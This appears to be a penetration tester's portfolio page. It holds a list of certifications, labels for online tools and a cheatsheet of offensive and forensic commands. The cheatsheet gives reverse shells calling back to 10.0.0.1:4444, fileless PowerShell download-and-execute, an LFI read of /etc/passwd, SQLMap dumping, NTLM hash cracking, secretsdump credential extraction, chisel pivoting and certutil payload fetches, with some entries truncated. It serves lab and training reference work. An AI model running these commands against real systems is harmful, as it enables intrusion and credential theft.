> whoami

Agnidhra Chakraborty

Licensed Penetration Tester (MASTER) (AC017-023)

Certified Ethical Hacker v 9.0

Fortinet NSE 1 Network Security Associate

EC Council Certified Security Analyst v 9.0

Fortinet NSE 2 Network Security Associate

Computer Hacking Forensic Investigator

Blackbag Certified Mobilyze Operator

Certiprof Cyber Security Foundation Professional

OSForensics Triage Certification

Certified Autopsy Analyst

ICSI Certified Network Security Specialist

AccessData Certified Investigator

FedVTE Cryptocurrency for Law Enforcement

Author of “Damn Book: A Complete Guide to Wireless and RF Hacking”

Bio-Metrics

LIVE

RHR

HRV

34 ms

Body Fat

12.9%

Sleep

98%

[ SECURITY ]

[ NETWORKING ]

[ DEV_TOOLS ]

[ CHEATSHEET ]

[ DNS INTELLIGENCE SCANNER ]

AWAITING TARGET DOMAIN...

[ IPv4 SUBNET CALCULATOR ]

NETWORK ID -

SUBNET MASK -

BROADCAST IP -

USABLE HOSTS -

[ PORT MAPPING DB ]

LISTENING...

[ MAC OUI DECODER ]

LISTENING...

[ BGP ASN DB ]

LISTENING...

[ USER-AGENT DECODER ]

BROWSER

ENGINE

DEVICE

[ REGEX EVALUATOR ]

Matches will appear here...

[ JSON PROCESSOR ]

[ UNIX EPOCH CHRONOMETER ]

LIVE TS: --

[ ENTITY ENCODER ]

[ BASE64 IMAGE PARSER ]

CLICK TO BROWSE OR DROP IMAGE HERE

[ HEX/RGB CONVERTER ]

HEX

RGB

[ ADVANCED PAYLOAD FORGE ]

LHOST (ATTACKER IP)

LPORT

[ REGEX CHEATSHEET ]

IPv4 Address ^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$

Email Address ^[\w-\.]+@([\w-]+\.)+[\w-]{2,4}$

HEX Color ^#?([a-fA-F0-9]{6}|[a-fA-F0-9]{3})$

MAC Address ^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$

Strong Pass ^(?=.*[A-Za-z])(?=.*\d)[A-Za-z\d]{8,}$

[ SVG MINIFY ENGINE ]

[ RECONNAISSANCE & MAPPING ]

Nmap Aggressive Spin: Exhaustive all-port scan with default scripts. Ideal for initial box mapping.

nmap -sC -sV -oA nmap_full -p- 10.10.10.1

FFUF Directory Bruteforce: Blazing fast directory enumeration using common wordlist.

ffuf -w /usr/share/wordlists/... -u http://TARGET/FUZZ

SMB Anonymous Null Session: Attempt to list Windows shares without credentials.

smbclient -N -L \\\\10.10.10.1\\

[ REVERSE SHELLS & PAYLOADS ]

Classic Bash Shell: Standard fallback shell for Linux targets. Needs open outbound port.

bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

Python Socket Shell: Highly reliable if target has Python installed (most Linux boxes do).

python -c 'import socket,subprocess,os;s=socket.socket...'

PHP Socket Exec: Best executed via RCE on web servers running PHP backend.

php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/sh...'

[ LINUX PRIVILEGE ESCALATION ]

Check sudo configs: Always the first step. Shows what commands current user can run.

sudo -l

Find SUID Binaries: Locates files executing with owner permissions (root). Cross reference with GTFOBins.

find / -perm -u=s -type f 2>/dev/null

TTY Shell Upgrade: Stabilizes a dumb netcat reverse shell into a fully interactive TTY.

python3 -c 'import pty; pty.spawn("/bin/bash")'

[ WINDOWS PRIVILEGE ESCALATION ]

System Info Extractor: Pulls exact Win OS version to hunt for specific kernel exploits.

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Unquoted Service Path Hunt: Finds vulnerable services where executable paths lack quotes.

wmic service get name,displayname,pathname...

In-Memory Payload Execution: Fileless malware execution bypassing basic disk antivirus.

powershell -c "IEX(New-Object Net.WebClient)...

[ BLUE TEAM: FORENSICS & MEMORY ]

Targeted PCAP Capture: Lossless packet capture of all HTTP traffic for Wireshark review.

tcpdump -i eth0 -n -s0 -w capture.pcap tcp port 80

Memory Dump Artifact Hunt: Brute force plain-text string extraction from a raw memory image.

strings memory.dmp | grep -i "password="

Live Backdoor Triage: Instantly check what processes are maliciously listening on ports.

lsof -i -P -n | grep LISTEN

[ BLUE TEAM: INCIDENT RESPONSE ]

Windows Event Log (Failed Logins): Quick powershell query for brute force attempts (Event ID 4625).

Get-WinEvent -FilterHashtable @{LogName='Security';Id=4625}

Linux Auditd TTY Log: Recovers exact keystrokes typed by an attacker interacting with a TTY shell.

aureport --tty

Recent Web Shell Hunt: Finds any file in the web directory modified within the last 24 hours.

find /var/www/html/ -type f -mtime -1

[ REVERSE ENGINEERING / BINARY ]

Extract Long Strings: Dump all readable strings over 8 chars from a stripped compiled binary.

strings -n 8 ./binary | grep -i flag

Disassembler (objdump): Output assembly code from the executable sections in readable Intel syntax.

objdump -d -M intel ./binary

Library Call Trace: Dynamically watch the binary pass hardcoded passwords via strcmp() during runtime.

ltrace ./binary

[ STEGANOGRAPHY & DATA HIDING ]

Steghide Extraction: Read hidden payload injected into least-significant bits of a JPG (no password).

steghide extract -sf image.jpg -p ''

Binwalk Firmware Carving: Scan a binary blob and auto-extract combined files (e.g. zip hidden in png).

binwalk -e firmware.bin

Zsteg LSB Detector: Check all standard encoding patterns for hidden text data strictly inside PNG/BMPs.

zsteg -a image.png

[ WEB EXPLOITATION ]

SQLMap Auto-DB Scan: Blind/Error/Time-based SQLi scanning to automatically dump backend root-level databases.

sqlmap -u "http://TARGET/page?id=1" --dbs --batch

LFI Directory Traversal: Break out of the webroot sandbox to read arbitrary internal OS files.

curl http://TARGET/?page=../../../../etc/passwd

XSS Cookie Stealer: Reflected or Stored JS payload to force victim to send their session token to your C2 server.

[ CRYPTOGRAPHY & CRACKING ]

John The Ripper: Standard CPU cracking for format-auto-detected hashes utilizing heavy wordlists.

john --wordlist=/usr/share/.../rockyou.txt hashes.txt

Hashcat NTLM Crack: GPU accelerated brute force on Windows NTLM hashes (mode 1000) using rockyou dictionary.

hashcat -m 1000 -a 0 hashes.txt rockyou.txt

RSA Asymmetric Decrypt: Unpack heavily encrypted cipher blocks if you manage to extract the victim's private key.

openssl rsautl -decrypt -inkey private.key -in ciph...

[ ADVANCED SHELL STABILIZATION ]

readline Wrapper (rlwrap): Grants up-arrow history and side-scrolling to any dumb reverse shell listener.

rlwrap nc -lvnp 9001

TTY Raw Upgrade (Ctrl+Z): Background your shell (Ctrl+Z), turn off local echo, foreground it, and set TERM so nano/vim works properly.

stty raw -echo; fg; export TERM=xterm

Silent Script Shell: Another powerful alternative to `python -c pty` to spawn a bash TTY locally if python is missing.

script -qc /bin/bash /dev/null

[ ACTIVE DIRECTORY EXPLOITATION ]

Mass SMB Spray & Enumeration: Use CME (or NetExec) to spray a known credential across a subnet and check for accessible network shares.

crackmapexec smb 10.10.10.0/24 -u 'user' -p 'pass' --shares

Impacket PsExec: Instantly spawns a `NT AUTHORITY\SYSTEM` CMD shell on a target if you have Administrator credentials.

impacket-psexec DOMAIN/User:[email protected]

SecretsDump SAM Extraction: Performs a DCSync or local SAM dump to extract NTLM hashes of all users on the domain controller.

impacket-secretsdump DOMAIN/User:[email protected]

[ PIVOTING & TUNNELING ]

Chisel Reverse Server: Setup your attack machine to accept inbound SOCKS proxy tunnels from compromised hosts.

chisel server -p 8000 --reverse

Chisel Socks Client: Run this on the victim to tunnel their internal network traffic out to your server port 1080.

chisel client 10.10.14.2:8000 R:socks

Dynamic SSH Pivot: Instantly opens a local SOCKS4/5 proxy (port 9050) routing exactly through the target via standard SSH.

ssh -D 9050 [email protected]

[ FILE TRANSFERS & EXFILTRATION ]

Instant Python Webserver: Quickest way to host local payload binaries (like linpeas or nc.exe) to pull from the target.

python3 -m http.server 80

PowerShell Invoke-WebRequest: Native Windows binary fetch. The `-OutFile` parameter bypasses execution memory constraints.

iwr -URI "http://10.10.14.2/nc.exe" -OutFile "C:\Temp\nc.exe"

Certutil LOLBIN Download: Native Windows certificate tool repurposed to securely download files over HTTP, bypassing some PowerShell restrictions.

certutil.exe -urlcache -split -f http://10.10.14.2/nc...

> whoami

Agnidhra Chakraborty

Bio-Metrics

[ ENTROPY GENERATOR ]

[ JWT DECODER ]

[ CHMOD PERM ENGINE ]

[ UNIVERSAL LOGIC ENGINE ]

REVERSIBLE (ENCODING)

IRREVERSIBLE (HASHING)

[ UUID BULK FORGE ]

[ EXIF METADATA EXTRACTOR ]

[ IOC DEFANG / REFANG ]

[ DNS INTELLIGENCE SCANNER ]

[ IPv4 SUBNET CALCULATOR ]

[ PORT MAPPING DB ]

[ MAC OUI DECODER ]

[ BGP ASN DB ]

[ USER-AGENT DECODER ]

[ REGEX EVALUATOR ]

[ JSON PROCESSOR ]

[ UNIX EPOCH CHRONOMETER ]

[ ENTITY ENCODER ]

[ BASE64 IMAGE PARSER ]

[ HEX/RGB CONVERTER ]

[ ADVANCED PAYLOAD FORGE ]

[ REGEX CHEATSHEET ]

[ SVG MINIFY ENGINE ]

[ RECONNAISSANCE & MAPPING ]

[ REVERSE SHELLS & PAYLOADS ]

[ LINUX PRIVILEGE ESCALATION ]

[ WINDOWS PRIVILEGE ESCALATION ]

[ BLUE TEAM: FORENSICS & MEMORY ]

[ BLUE TEAM: INCIDENT RESPONSE ]

[ REVERSE ENGINEERING / BINARY ]

[ STEGANOGRAPHY & DATA HIDING ]

[ WEB EXPLOITATION ]

[ CRYPTOGRAPHY & CRACKING ]

[ ADVANCED SHELL STABILIZATION ]

[ ACTIVE DIRECTORY EXPLOITATION ]

[ PIVOTING & TUNNELING ]

[ FILE TRANSFERS & EXFILTRATION ]